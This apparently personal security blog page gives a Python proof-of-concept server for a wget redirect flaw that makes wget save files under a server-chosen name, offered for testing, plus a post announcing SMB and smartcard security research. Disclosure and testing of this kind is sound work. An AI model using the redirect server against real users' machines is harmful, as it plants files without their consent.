WGET file redirect exploit

While browsing full-disclosure this morning I noticed a vulnerability in WGET and decided to write a working exploit for it to show the issue.

The problem is, if you request a file, for example:
and the server returns a redirect to say
WGET will store the downloaded file with the filename of ‘malicious_filename’ !
Exploit code to test if your system is vulnerable:

import BaseHTTPServer;
import time
import sys

HOST_NAME = "0.0.0.0"
PORT_NUMBER = 80

TARGET_FILENAME = ".pwned"
TARGET_CONTENT = "VULNERABLE SYSTEM"

class wget_exploit(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
if self.path != "/%s" % (TARGET_FILENAME):
# do our redirect
self.send_response(301) # send the redirect
self.send_header("Location", TARGET_FILENAME) # redirect to the target
self.end_headers()

self.wfile.write("WOOPSPLOIT by XPN (http://xpnsbraindump.blogspot.com)")

else:
# send exploited file with new filename
self.send_response(200)
self.end_headers()

self.wfile.write(TARGET_CONTENT)


if __name__ == '__main__':
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), wget_exploit)
print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass

httpd.server_close()
print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)

Advertisements

The Future Of XPN’s Brain Dump

Well today I registered a new youtube profile. The aim is to have some videos up to demonstrate some security features and some of the programs I’ve been working on visually rather than describing them.
My youtube channel can be found at http://www.youtube.com/user/xpnsecurity. Please feel free to subscribe and watch the twitter feed for any updates.
Right now currently I’m working on 2 projects
My first project will focus on SMB security. This is something that I have been meaning to do for a while, as SMB is always around us. Even linux users find Samba installed on many distributions. The areas that I will be focusing on with this will be:
  • Core SMB protocol details
  • SMB authentication and brute force
  • Auto penetration of a network using SMB
  • SMB misconfiguration
The second project that I am working on is quite a difficult one for me as I haven’t touched hardware in quite a while. I will be focusing on smartcard security (ISO 7816 for those interested). Again this will focus on areas including
  • Smart Card interfacing
  • Interfacing with different card classes
  • Embedded security and weaknesses
I am hoping to dedicate more time to this blog and keep it more structured as the aim is to now try and turn this hobby into a career. As always if you have any comments I would love to hear them.